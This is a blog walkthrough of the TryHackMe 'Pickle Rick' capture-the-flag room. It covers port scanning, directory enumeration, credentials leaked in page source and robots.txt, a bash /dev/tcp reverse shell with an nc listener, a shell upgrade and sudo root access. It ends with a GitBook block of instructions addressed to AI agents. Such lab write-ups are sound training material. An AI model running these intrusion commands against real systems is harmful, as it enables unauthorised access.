> For the complete documentation index, see [llms.txt](https://blogs.cracksoft.in/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blogs.cracksoft.in/tryhackme/pickle-rick-tryhackme-room-explained-learn-hacking-the-fun-way.md).

# Pickle Rick TryHackMe Room Explained — Learn Hacking the Fun Way

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529171310.png?raw=true" alt=""><figcaption></figcaption></figure>

### What is Tryhackme ?

**TryHackMe** is an online cybersecurity training platform designed to teach hacking and cybersecurity skills through interactive, hands-on labs. It provides a virtual environment where users can learn by doing, making it ideal for beginners as well as more advanced learners. Each lesson or challenge is structured into "rooms," which guide users through different security concepts using real-world scenarios, tools, and techniques.

### **Why Pickle Rick ?**

The **Pickle Rick** room on TryHackMe is a fun and educational cybersecurity challenge inspired by the *Rick and Morty* TV show. In this scenario, Rick has turned himself into a pickle (again!), and it's our job to help him return to normal by hacking into a vulnerable web server and retrieving **three hidden flags**.

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529172856.png?raw=true" alt=""><figcaption></figcaption></figure>

This challenge teaches us important cybersecurity skills like **port scanning**, **web enumeration**, **command injection**, and **basic privilege escalation**. If you're new to ethical hacking, this is a great place to start. Let's go step-by-step and explain **what we did and why**.

**In summary,** the "Pickle Rick" room offers a hands-on introduction to core cybersecurity techniques such as scanning, enumeration, web vulnerability exploitation, and basic Linux command-line navigation. It provides a practical and fun environment to build your confidence and skills as you begin your journey into ethical hacking.

### **Step 1:  Network Scanning with Nmap**

**What we’re doing:** We run an Nmap scan to discover which services (like web or SSH) are running on the target machine.

```
nmap -p- -A -Pn -oN Scan -v --min-rate=5000 $IP
```

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529180421.png?raw=true" alt=""><figcaption></figcaption></figure>

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529183228.png?raw=true" alt=""><figcaption></figcaption></figure>

**Why we’re doing it:**\
This helps us understand what attack surface is available. In our scan, we see:

* **Port 22 (SSH)** is open — could be useful later for remote access.
* **Port 80 (HTTP)** is open — this means a website is hosted, and we’ll start exploring there.

### **Step 2: Explore the Website (Port 80)**

**What we did:** We opened the website in a browser: `http://10.10.XXX.XXX` The page looked simple with a Rick and Morty theme, but no login form or input box was available.

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529195641.png?raw=true" alt=""><figcaption></figcaption></figure>

The page loads, but there’s nothing useful shown on the main screen.

**Why we did it:** To manually inspect the webpage. Sometimes websites give clues about usernames, passwords, or hidden pages.

### **Step 3: View Page Source to Look for Clues**

**What we’re doing:** We right-click → View Page Source.&#x20;

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529195820.png?raw=true" alt=""><figcaption></figcaption></figure>

**Why we did it:** Developers often leave useful info in comments (especially in CTF challenges). This might help us log in later.

### **Step 4: Directory Enumeration with dirsearch**

**What we did:** We used directory brute-forcing tools to find hidden files and folders.

```
gobuster dir -u http://10.10.XXX.XXX -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50
```

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529184829.png?raw=true" alt=""><figcaption></figcaption></figure>

**Why we did it:** Websites often have hidden pages like login panels or secret files. Brute-forcing reveals these endpoints that aren’t visible in normal navigation.

### Step 5: Check robots.txt for Secrets

**What we’re doing:** We visit: <http://10.10.x.x/robots.txt>

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529200154.png?raw=true" alt=""><figcaption></figcaption></figure>

**It contains the string:** Wubbalubbadubdub

#### Try to Log In Using Clues

**What we’re doing:** We go to the login page found earlier:

```
Username: R1ckRul3s
Password: Wubbalubbadubdub
```

**Why we did it:** robots.txt usually tells search engines which paths not to index. Sometimes, sensitive info is mistakenly left here. In this case, this looks like a **password**.

### **Step 6: Login to the Web Portal**

**What we did:** Visited `/login.php` and entered:

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529200834.png?raw=true" alt=""><figcaption></figcaption></figure>

Login was successful, and we were redirected to `/portal.php`.

**Why we did it:** We found the username in the HTML source and the password in robots.txt. This kind of low-hanging fruit is common in beginner CTFs.

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529200950.png?raw=true" alt=""><figcaption></figcaption></figure>

### **Step 7: Command Panel Access**

Once logged in, we see a panel where we can enter **Linux system commands**. We tried `ls` and saw files in the directory including: `Sup3rS3cretPickl3Ingred.txt`

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250530012525.png?raw=true" alt=""><figcaption></figcaption></figure>

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529201315.png?raw=true" alt=""><figcaption></figcaption></figure>

### **Step 8: Spawn a Reverse Shell**

**What we did:** We used a reverse shell payload to gain full access to the system:

```
bash -c 'exec bash -i &>/dev/tcp/$IP/$PORT <&1'
```

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529233745.png?raw=true" alt=""><figcaption></figcaption></figure>

On our local machine, we ran: `nc -lvp 4444`  Once the command was submitted, we got a shell back!

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250529233804.png?raw=true" alt=""><figcaption></figcaption></figure>

**Why we did it:** Web command panels often allow command injection. A reverse shell gives us full terminal control instead of just basic output.

### **Step 9: Make the Shell Interactive**

To improve our shell experience, we did the following:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

CTRL+Z

```
stty raw -echo; fg
export SHELL=bash
export TERM=xterm-256color
reset
```

**Why we did it:** The initial shell is basic and hard to work with. These commands give us a **fully interactive bash shell** that supports arrow keys, tab completion, and more.

To Learn more about TTY Shells; don't forget to read our another blog: **LINK**

Now, let's check what we can run with sudo (without password)

### **Step 10: Find the Ingredients (Flags)**

**Ingredient 1:** Found in the web directory as `Sup3rS3cretPickl3Ingred.txt`

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250530013442.png?raw=true" alt=""><figcaption></figcaption></figure>

**Ingredient 2:** Found in Rick’s home directory&#x20;

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250530013648.png?raw=true" alt=""><figcaption></figcaption></figure>

**Ingredient 3:** We checked for sudo permissions: `sudo -l`

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250530003134.png?raw=true" alt=""><figcaption></figcaption></figure>

It showed that we can run **any command as root without a password!**

<figure><img src="https://github.com/CracksoftShlok/PickleRickTryhackME/raw/main/Pasted%20image%2020250530014004.png?raw=true" alt=""><figcaption></figcaption></figure>

### **Challenge Complete!**

We successfully completed the Pickle Rick challenge by carefully enumerating the target website, identifying hidden clues, and using them to log into the web application. Once inside, we discovered a command execution panel that allowed us to interact with the system. By crafting a reverse shell payload, we upgraded our access from the web interface to a full interactive shell on the target machine. From there, we navigated the file system, located the first two secret ingredients, and finally escalated our privileges to root using available sudo permissions. This gave us full control over the system, allowing us to retrieve the third and final ingredient. With all three ingredients in hand, Rick is finally back to being human.

### **Final Thoughts**

The Pickle Rick room is an excellent introduction to the world of ethical hacking. It teaches foundational skills in a fun and engaging way, making it ideal for beginners. Through this room, we learned the importance of thorough enumeration, how useful it can be to check source code for hidden information, and how to approach web exploitation when login portals and restricted commands are involved. We also got hands-on experience with reverse shells and understood the basics of privilege escalation in a Linux environment. Overall, this room is not just entertaining but also highly educational, offering real-world techniques in a beginner-friendly format.

**Thanks for Reading! I Hope you loved it! don't forget to share in your friends circle :)**


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://blogs.cracksoft.in/tryhackme/pickle-rick-tryhackme-room-explained-learn-hacking-the-fun-way.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
